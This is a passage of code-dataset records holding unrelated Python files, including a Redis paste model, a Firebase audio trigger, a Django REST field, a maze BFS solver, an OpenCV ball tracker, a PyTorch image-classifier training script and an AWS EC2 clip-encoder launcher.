\"\"\"\n if not self.key:\n raise self.NotFound(\"instance does not have key\")\n if not self._redis_connection.delete(self.key):\n raise self.NotFound(\"not stored\")\n self.key = None\n return self\n", "repo_name": "sbrandtb/bytebin", "sub_path": "bytebin/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1683, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "uuid.uuid4", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "14499935102", "text": "import pyrebase\nfrom sonido import audio\nimport os\nimport threading\nimport time\nconfig = {\n \"apiKey\": \"AIzaSyAMTu6x5C8BT3F3rUgXmZTA8UocJO-29Rk\",\n \"authDomain\": \"prueba-storage-python.firebaseapp.com\",\n \"databaseURL\": \"https://prueba-storage-python.firebaseio.com\",\n \"projectId\": \"prueba-storage-python\",\n \"storageBucket\": \"prueba-storage-python.appspot.com\",\n \"messagingSenderId\": \"572392876919\"\n}\n\nfirebase = pyrebase.initialize_app(config)\nstorage = firebase.storage()\ndb = firebase.database()\na = audio(\"d.mp3\")\n##storage.child(\"pruebas/prueba1.py\").put(\"d.mp3\")\n\ndef stop():\n time.sleep(5)\n os.system(\"pkill mpg123\")\n\n\ndef stream_user(message):\n print(message)\n if message[\"data\"]:\n t = threading.Thread(target=stop)\n t.start()\n a.play()\nstream = db.child(\"audio\").stream(stream_user)\n", "repo_name": "marteoma/DigitalesProyecto", "sub_path": "prueba.firebase.py", "file_name": "prueba.firebase.py", "file_ext": "py", "file_size_in_byte": 840, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pyrebase.initialize_app", "line_number": 15, "usage_type": "call"}, {"api_name": "sonido.audio", "line_number": 18, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}, {"api_name": "os.system", "line_number": 23, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "34815081494", "text": "from collections import OrderedDict\nimport ujson\n\nimport six\nfrom django.db.models.manager import BaseManager\nfrom rest_framework_json_api.relations import ResourceRelatedField\n\nfrom 
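Paste.save above leans on redis-py's SET flags: xx updates only an existing key, while nx together with ex atomically claims a fresh key with a TTL. A hedged sketch of that allocation idiom, assuming a Redis server on localhost:

import uuid

import redis

r = redis.Redis()   # assumes a local Redis server on the default port

def allocate_unique(value, ttl=3600):
    # SET ... NX EX only succeeds when the key is absent, so a uuid4
    # collision (however unlikely) simply retries instead of overwriting.
    while True:
        key = str(uuid.uuid4())
        if r.set(key, value, nx=True, ex=ttl):
            return key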
zc_common.remote_resource.models import RemoteResource\n\n\nclass RemoteResourceField(ResourceRelatedField):\n\n def __init__(self, related_resource_path=None, **kwargs):\n if 'model' not in kwargs:\n kwargs['model'] = RemoteResource\n if not kwargs.get('read_only', None):\n # The queryset is required to be not None, but not used\n # due to the overriding of the methods below.\n kwargs['queryset'] = {}\n\n if related_resource_path is None:\n raise NameError('related_resource_path parameter must be provided')\n\n self.related_resource_path = related_resource_path\n\n super(RemoteResourceField, self).__init__(**kwargs)\n\n def get_links(self, obj=None, lookup_field='pk'):\n request = self.context.get('request', None)\n view = self.context.get('view', None)\n return_data = OrderedDict()\n\n kwargs = {lookup_field: getattr(obj, lookup_field) if obj else view.kwargs[lookup_field]}\n\n self_kwargs = kwargs.copy()\n self_kwargs.update({'related_field': self.field_name if self.field_name else self.parent.field_name})\n self_link = self.get_url('self', self.self_link_view_name, self_kwargs, request)\n\n # Construct the related link using the passed related_resource_path\n # self.source is the field name; getattr(obj, self.source) returns the\n # RemoteResource object or RelatedManager in the case of a to-many relationship.\n related_obj = getattr(obj, self.source)\n if related_obj and related_obj.id:\n if isinstance(related_obj, BaseManager):\n list_of_ids = related_obj.values_list('pk', flat=True)\n query_parameters = 'filter[id__in]={}'.format(','.join([str(pk) for pk in list_of_ids]))\n related_path = self.related_resource_path.format(pk=query_parameters)\n else:\n related_path = self.related_resource_path.format(pk=related_obj.id)\n related_link = request.build_absolute_uri(related_path)\n else:\n related_link = None\n\n if self_link:\n return_data.update({'self': self_link})\n if related_link:\n return_data.update({'related': related_link})\n return return_data\n\n def to_internal_value(self, data):\n if isinstance(data, six.text_type):\n try:\n data = ujson.loads(data)\n except ValueError:\n self.fail('incorrect_type', data_type=type(data).__name__)\n if not isinstance(data, dict):\n self.fail('incorrect_type', data_type=type(data).__name__)\n\n if 'type' not in data:\n self.fail('missing_type')\n\n if 'id' not in data:\n self.fail('missing_id')\n\n return RemoteResource(data['type'], data['id'])\n\n def to_representation(self, value):\n return OrderedDict([('type', value.type), ('id', str(value.id))])\n", "repo_name": "ZeroCater/zc_common", "sub_path": "zc_common/remote_resource/relations.py", "file_name": "relations.py", "file_ext": "py", "file_size_in_byte": 3127, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework_json_api.relations.ResourceRelatedField", "line_number": 11, "usage_type": "name"}, {"api_name": "zc_common.remote_resource.models.RemoteResource", "line_number": 15, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models.manager.BaseManager", "line_number": 44, "usage_type": "argument"}, {"api_name": "six.text_type", "line_number": 61, "usage_type": "attribute"}, {"api_name": "ujson.loads", "line_number": 63, "usage_type": "call"}, {"api_name": "zc_common.remote_resource.models.RemoteResource", "line_number": 75, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 78, 
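The maze record just below runs BFS over (row, col, broken) states so that at most one wall may be knocked down before reaching the exit. The same idea distilled into a standalone function with a worked input, as a sketch alongside the class-based original:

from collections import deque

def shortest_path_one_break(grid):
    # State is (row, col, k); k flips to 1 once the single allowed wall is
    # broken. Distances count visited cells, matching the record's convention.
    n, m = len(grid), len(grid[0])
    dist = [[[0, 0] for _ in range(m)] for _ in range(n)]
    dist[0][0][0] = 1
    q = deque([(0, 0, 0)])
    while q:
        i, j, k = q.popleft()
        if (i, j) == (n - 1, m - 1):
            return dist[i][j][k]
        for di, dj in ((0, 1), (0, -1), (1, 0), (-1, 0)):
            x, y = i + di, j + dj
            if 0 <= x < n and 0 <= y < m:
                if grid[x][y] == 1 and k == 0 and not dist[x][y][1]:
                    dist[x][y][1] = dist[i][j][0] + 1
                    q.append((x, y, 1))
                elif grid[x][y] == 0 and not dist[x][y][k]:
                    dist[x][y][k] = dist[i][j][k] + 1
                    q.append((x, y, k))
    return -1

print(shortest_path_one_break([[0, 1, 0],
                               [0, 1, 0],
                               [0, 1, 0]]))   # 5: break one wall in the middle column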
"usage_type": "call"}]} +{"seq_id": "70212758565", "text": "import sys\r\nfrom collections import deque\r\n\r\n\r\nclass Maze:\r\n def __init__(self) -> None:\r\n self.N: int\r\n self.M: int\r\n self.mat: list[list[int]]\r\n self.get_info()\r\n\r\n def get_info(self) -> None:\r\n self.N, self.M = map(int, input().split())\r\n self.mat = [list(map(int, list(input().strip())))\r\n for _ in range(self.N)]\r\n\r\n def move(self) -> int:\r\n visited = [[[0] * 2 for _ in range(self.M)] for _ in range(self.N)]\r\n visited[0][0][0] = 1\r\n Q = deque([(0, 0, 0)])\r\n Dx = [0, 0, -1, 1]\r\n Dy = [-1, 1, 0, 0]\r\n while Q:\r\n i, j, k = Q.popleft()\r\n if i == self.N - 1 and j == self.M - 1:\r\n return visited[i][j][k]\r\n for dx, dy in zip(Dx, Dy):\r\n x = i + dx\r\n y = j + dy\r\n if 0 <= x < self.N and 0 <= y < self.M:\r\n if self.mat[x][y] == 1 and k == 0 and not visited[x][y][k + 1]:\r\n visited[x][y][k + 1] = visited[i][j][k] + 1\r\n Q.append((x, y, k + 1))\r\n elif self.mat[x][y] == 0 and not visited[x][y][k]:\r\n visited[x][y][k] = visited[i][j][k] + 1\r\n Q.append((x, y, k))\r\n return -1\r\n\r\n\r\ndef main():\r\n maze = Maze()\r\n print(maze.move())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n input = sys.stdin.readline\r\n main()\r\n", "repo_name": "SeungWoo-You/PS", "sub_path": "백준/Gold/2206. 벽 부수고 이동하기/벽 부수고 이동하기.py", "file_name": "벽 부수고 이동하기.py", "file_ext": "py", "file_size_in_byte": 1451, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 20, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 46, "usage_type": "attribute"}]} +{"seq_id": "17004314430", "text": "# from tkinter import X\n# from tkinter.ttk import Style\n#import PIL.Image, PIL.ImageTk\nimport imutils as imutils\nfrom PIL import Image, ImageEnhance\n# import tkinter as tk\n# import math\n# from collections import deque\n# from imutils.video import VideoStream\nimport numpy as np\n# import argparse\nimport cv2\n\n\nH_MIN = 0;\nH_MAX = 256;\nS_MIN = 0;\nS_MAX = 256;\nV_MIN = 0;\nV_MAX = 256;\n# default capture width and height\nFRAME_WIDTH = 640;\nFRAME_HEIGHT = 480;\n# max number of objects to be detected in frame\nMAX_NUM_OBJECTS=50;\n# minimum and maximum object area\nMIN_OBJECT_AREA = 20*20;\nMAX_OBJECT_AREA = FRAME_HEIGHT*FRAME_WIDTH/1.5;\n\n\n#\n# def switches(switch):\n# cv2.createTrackbar(switch, 'Video Frame', 0, 1, applyVal)\n# cv2.createTrackbar('lower', 'Video Frame', 0, 255, applyVal)\n# cv2.createTrackbar('upper', 'Video Frame', 0, 255, applyVal)\n# cv2.createTrackbar('Blur', 'Video Frame', 3, 5, applyVal)\n\n\n#\n# # determine upper and lower HSV limits for (my) skin tones\n\n\n\ndef main():\n camera = cv2.VideoCapture(\"video.mp4\")\n # camera = cv2.VideoCapture(0)\n cv2.namedWindow('Original Output')\n #\n # switch = '0 : OFF \\n1 : ON'\n # switches(switch)\n\n while (True):\n ret, frame = camera.read()\n if not ret:\n continue\n #\n # lower_i = cv2.getTrackbarPos('lower', 'Original Output')\n # upper_i = cv2.getTrackbarPos('upper', 'Original Output')\n # s = cv2.getTrackbarPos(switch, 'Original Output')\n\n # referencias de cores para a bola verde\n # low_green = np.array([35, 40, 19])\n # up_green = np.array([82, 246, 139])\n\n lower = np.array([20, 207, 139], dtype=\"uint8\")\n upper = np.array([83,255,255], dtype=\"uint8\")\n # switches(switch)\n\n # lower = np.array([35, 40, 19], dtype=\"uint8\")\n # upper = np.array([82, 246, 139], dtype=\"uint8\")\n #\n\n\n # # switch to 
HSV\n\n #green_low_new\n # lower = np.array([17, 34, 18], dtype=\"uint8\")\n # upper = np.array([53, 139, 102], dtype=\"uint8\")\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n\n # #bola azul\n # lower = np.array([55, 80, 26], dtype=\"uint8\")\n # upper = np.array([110, 255, 187], dtype=\"uint8\")\n\n # find mask of pixels within HSV range\n mask = cv2.inRange(hsv, lower, upper)\n\n # cv2.imshow(\"Original\", frame)\n # # cv2.imshow(\"HSV\", hsv)\n # cv2.imshow(\"skinMask\", mask)\n\n # atualizar para a skinmask\n\n # construct a mask for the color \"green\", then perform\n # a series of dilations and erosions to remove any small\n # blobs left in the mask\n # mask = cv2.inRange(hsv, greenLower, greenUpper)\n\n #\n # mask = cv2.erode(mask, None, iterations=2)\n # mask = cv2.dilate(mask, None, iterations=2)\n #\n # cv2.imshow(\"skinMask2\", mask)\n\n #\n #\n # # find contours in the mask and initialize the current\n # # (x, y) center of the ball\n # cnts, hierarchy = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,\n # cv2.CHAIN_APPROX_SIMPLE)\n contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n # print(contours)\n\n for contour in contours:\n area = cv2.contourArea(contour)\n if area > 10:\n cv2.drawContours(frame, contour, -1, (0, 255, 0), 3)\n print(contours)\n\n\n cv2.imshow(\"Original\", frame)\n # cv2.imshow(\"HSV\", hsv)\n cv2.imshow(\"skinMask\", mask)\n\n\n # print(\"aqui conntor\",cnts)\n # print(\"aqui hierarquia\",hierarchy)\n #\n # cnts = cnts[0] if imutils.is_cv2() else cnts[1]\n # print (cnts)\n # center = None\n\n # # # only proceed if at least one contour was found\n # if len(cnts) > 0:\n # # find the largest contour in the mask, then use\n # # it to compute the minimum enclosing circle and\n # # centroid\n # c = max(cnts, key=cv2.contourArea)\n # ((x, y), radius) = cv2.minEnclosingCircle(c)\n # M = cv2.moments(c)\n #\n # center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n #\n # # only proceed if the radius meets a minimum size\n # if radius > 5:\n # # draw the circle and centroid on the frame,\n # # then update the list of tracked points\n # cv2.circle(frame, (int(x), int(y)), int(radius),\n # (0, 255, 255), 2)\n # cv2.circle(frame, center, 5, (0, 0, 255), -1)\n\n # # update the points queue\n # pts.appendleft(center)\n\n if cv2.waitKey(100) == 27:\n break\n\n camera.release()\n cv2.destroyAllWindows()\n\n\n# def applyVal(value):\n# print('Applying blur!', value)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "thiagodalmoro/INF_UFRGS-Vision", "sub_path": "TrabFinal_Vision/test_ball_CTL.py", "file_name": "test_ball_CTL.py", "file_ext": "py", "file_size_in_byte": 4918, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.VideoCapture", "line_number": 45, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 80, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 80, "usage_type": "attribute"}, {"api_name": "cv2.inRange", "line_number": 88, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.RETR_TREE", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_NONE", "line_number": 113, "usage_type": 
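The tracking loop above thresholds in HSV and draws contours, while the centroid logic sits in its commented-out section. A condensed, self-contained sketch of that full pipeline, assuming OpenCV 4's two-value findContours return; a synthetic frame stands in for the video:

import cv2
import numpy as np

# One green square on a black frame, so the sketch runs without a capture device.
frame = np.zeros((120, 160, 3), dtype=np.uint8)
cv2.rectangle(frame, (60, 40), (100, 80), (0, 200, 0), -1)

hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, np.array([35, 40, 19]), np.array([82, 255, 255]))

# OpenCV 4 returns (contours, hierarchy); take the largest blob's centroid.
contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
c = max(contours, key=cv2.contourArea)
M = cv2.moments(c)
cx, cy = int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"])
print(cx, cy)   # roughly (80, 60), the centre of the square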
"attribute"}, {"api_name": "cv2.contourArea", "line_number": 117, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 123, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 125, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 157, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 161, "usage_type": "call"}]} +{"seq_id": "30300691215", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\nfrom torchvision import datasets,transforms,models\nimport numpy as np\nimport json\nfrom collections import OrderedDict\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nimport helper\nimport numpy as np\nimport argparse\n\n\nparser = argparse.ArgumentParser(description='Image Classifier')\nparser.add_argument('--data_dir',type = str, default = './flowers', help = 'Path to dataset directory')\nparser.add_argument('--save_dir',type = str, default = './', help = 'Path to checkpint save directory')\nparser.add_argument('--arch',type = str, default = 'vgg', help = 'Tranfer learning model')\nparser.add_argument('--lr',type = float, default = 0.001, help = 'learning rate')\nparser.add_argument('--epochs',type = int, default = 10, help = 'epochs')\nparser.add_argument('--hidden_layers',type = int, default = 500, help = 'hidden units')\nparser.add_argument('--gpu',type = str, default = 'cpu', help = 'GPU or CPU')\n\nargs=parser.parse_args()\n\n\ndata_dir = args.data_dir\ntrain_dir = data_dir + '/train'\nvalid_dir = data_dir + '/valid'\ntest_dir = data_dir + '/test'\n\n\n\ntrain_transforms = transforms.Compose([transforms.RandomRotation(30),\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n\ntest_transforms = transforms.Compose([transforms.Resize(255),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\nvalidate_transforms=transforms.Compose([transforms.Resize(255),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n\n\ntrain_data = datasets.ImageFolder(train_dir, transform=train_transforms)\ntest_data = datasets.ImageFolder(test_dir, transform=test_transforms)\nvalidate_data=datasets.ImageFolder(test_dir, transform=test_transforms)\n\ntrainloader = torch.utils.data.DataLoader(train_data, batch_size=64, shuffle=True)\ntestloader = torch.utils.data.DataLoader(test_data, batch_size=64)\nvalidloader=torch.utils.data.DataLoader(validate_data, batch_size=64)\n\nif args.arch == 'vgg':\n input_size = 25088\n model = models.vgg16(pretrained=True)\nelif args.arch == 'resnet':\n input_size = 2048\n model = models.alexnet(pretrained=True)\n\nfor param in model.parameters():\n param.requires_grad = False\nmodel.classifier=nn.Sequential(nn.Linear(input_size, args.hidden_layers),\n nn.ReLU(),\n nn.Dropout(p=0.5),\n nn.Linear(args.hidden_layers,102),\n nn.LogSoftmax(dim=1))\nprint(model)\n\ncriterion=nn.NLLLoss()\ndevice=args.gpu\noptimizer=optim.Adam(model.classifier.parameters(), args.lr)\nloss,accuracy=helper.validate(model,criterion,testloader,device)\nprint(f\"loss: {loss} \\n Accuracy: 
{accuracy}\")\nepochs=args.epochs\nmodel=helper.train(model,optimizer,criterion,epochs,trainloader,validloader,device)\nhelper.accuracy(model,testloader,device)\nhelper.save(model,train_data,args.arch,input_size,args.hidden_layers,epochs,args.lr)\n\n\n\n\n", "repo_name": "Harish4948/Image-Classifier-using-Deep-Learning", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 3771, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 17, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 36, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 36, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomRotation", "line_number": 36, "usage_type": "call"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 37, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomHorizontalFlip", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 38, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 39, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 39, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 40, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 40, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 43, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 43, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 43, "usage_type": "call"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 44, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 44, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 45, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 45, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 46, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 46, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 48, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 48, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 48, "usage_type": "call"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 49, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 49, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 50, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 50, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 51, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 51, "usage_type": "name"}, {"api_name": "torchvision.datasets.ImageFolder", "line_number": 55, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 55, "usage_type": "name"}, {"api_name": "torchvision.datasets.ImageFolder", "line_number": 56, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 56, "usage_type": "name"}, {"api_name": "torchvision.datasets.ImageFolder", "line_number": 57, 
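The training script above freezes the pretrained feature extractor and swaps in a fresh classifier head. The same pattern in isolation, assuming torchvision >= 0.13 for the string weights argument (weights download on first use):

import torch.nn as nn
from torchvision import models

model = models.vgg16(weights="IMAGENET1K_V1")   # older torchvision: pretrained=True
for p in model.parameters():
    p.requires_grad = False                     # freeze the convolutional backbone

model.classifier = nn.Sequential(               # only the new head will train
    nn.Linear(25088, 500), nn.ReLU(), nn.Dropout(p=0.5),
    nn.Linear(500, 102), nn.LogSoftmax(dim=1),
)
trainable = [p for p in model.parameters() if p.requires_grad]
print(sum(p.numel() for p in trainable))        # parameters to hand the optimizer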
"usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 61, "usage_type": "attribute"}, {"api_name": "torchvision.models.vgg16", "line_number": 65, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 65, "usage_type": "name"}, {"api_name": "torchvision.models.alexnet", "line_number": 68, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 81, "usage_type": "name"}, {"api_name": "helper.validate", "line_number": 82, "usage_type": "call"}, {"api_name": "helper.train", "line_number": 85, "usage_type": "call"}, {"api_name": "helper.accuracy", "line_number": 86, "usage_type": "call"}, {"api_name": "helper.save", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "19641423651", "text": "from steganography import Steganography\nimport cv2\n\nif __name__ == '__main__':\n algo = Steganography(seed=2023)\n\n color = cv2.imread('img_1.png')\n grayscale = cv2.imread('img_2.png', flags=0)\n\n encrypted = algo.encrypt(grayscale, color)\n cv2.imwrite('encrypted.png', encrypted)\n\n decrypted = algo.decrypt(grayscale.shape, encrypted)\n cv2.imwrite('decrypted.png', decrypted)\n", "repo_name": "AliSK81/steganography", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 395, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "steganography.Steganography", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "43709700999", "text": "#! /usr/bin/python3\n\nimport argparse\nimport utils\nimport sys\nimport time\n\n\ndef arg_parser():\n parser = argparse.ArgumentParser(\n description='EC2 tool',\n usage='e.g. 
ec2.py access_keyID secret_accessKEY --tag staging-innovi'\n )\n parser.add_argument('id', help=\"The aws access id\", type=str)\n parser.add_argument('key', help=\"The aws access key\", type=str)\n parser.add_argument('--name', help=\"Your name to load customize env configuration (elad/efrat/anna) \",\n choices=['elad', 'efrat', 'anna'], type=str, required=True)\n parser.add_argument('--builds', help=\"The desired build names (for e.g build-dev-3695, build-rc-1.2.1-3664)\",\n nargs='+', type=str, required=True)\n parser.add_argument('--amount', help=\"How many clips to create for each build\", type=int, default=10)\n parser.add_argument('--keep', help=\"Do not delete current machine clip\", action='store_true', default=False)\n parser.add_argument('--region', help=\"The aws region (default: us-west-2)\", type=str, default=\"us-west-2\")\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(\"\\nPlease see Usage\")\n return parser.parse_args()\n\n\ndef main():\n args = arg_parser()\n new_request = utils.EncoderClip(args.id, args.key, args.region, args.name, args.builds)\n if not args.keep:\n exists_machine = new_request.current_running_instances('Etool_Encoder_{}'.format(args.name))\n if exists_machine:\n new_request.terminate_instances(exists_machine)\n new_instance_id = new_request.create_clip_encoder()\n new_request.is_instance_status_ok(new_instance_id)\n new_instance_ip = new_request.instance_id_to_ip(new_instance_id)\n\n retries = 10\n while retries != 0:\n try:\n start_clips = utils.Ssh(new_instance_ip, 'ubuntu')\n except Exception as err:\n print(\"SSH to Encoder machine ({}) failed:{}\\nRetrying...\".format(new_instance_ip, err))\n retries -= 1\n time.sleep(10)\n else:\n break\n\n index = 0\n for build in args.builds:\n for clip in range(args.amount):\n start_clips.execute('./etool_testLoopDocker.sh {} {} {} {}'.format(args.name, index, index, build))\n index += 1\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "eshor-leshem/EtoolProject", "sub_path": "create_clip_machine_and_clips.py", "file_name": "create_clip_machine_and_clips.py", "file_ext": "py", "file_size_in_byte": 2318, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 25, "usage_type": "call"}, {"api_name": "utils.EncoderClip", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.Ssh", "line_number": 43, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "7318754136", "text": "\"\"\"\nAuthor: Austin Dibble\n\"\"\"\n\nimport os\nimport shutil\nimport zipfile\nimport torch\nimport matplotlib.pyplot as plt\nfrom typing import Dict, Optional\nfrom torchvision.transforms.functional import to_pil_image\nfrom torchgeo.datasets.utils import draw_semantic_segmentation_masks\nimport numpy as np\nimport kornia.augmentation as K\n\ndef create_folder_if_not_exists(folder_path):\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n\ndef copy_file(source_path, destination_path):\n shutil.copy(source_path, destination_path)\n\ndef unzip_file(zip_path, extract_path):\n with zipfile.ZipFile(zip_path, 'r') as zip_ref:\n zip_ref.extractall(extract_path)\n\ndef move_folder(source_path, destination_path):\n shutil.move(source_path, destination_path)\n\ndef copy_and_unzip(local_path, drive_path, 
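The provisioning script above retries the SSH connection in a fixed loop. A generic retry helper with optional exponential backoff; this is a sketch, not the project's utils code, and the commented usage reuses the script's own names:

import time

def retry(fn, attempts=10, delay=10, backoff=1.0):
    # Call fn until it succeeds; re-raise the last error once the budget is spent.
    for attempt in range(attempts):
        try:
            return fn()
        except Exception:
            if attempt == attempts - 1:
                raise
            time.sleep(delay * (backoff ** attempt))

# Usage, mirroring the loop above (utils.Ssh and new_instance_ip as in the script):
# start_clips = retry(lambda: utils.Ssh(new_instance_ip, 'ubuntu'))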
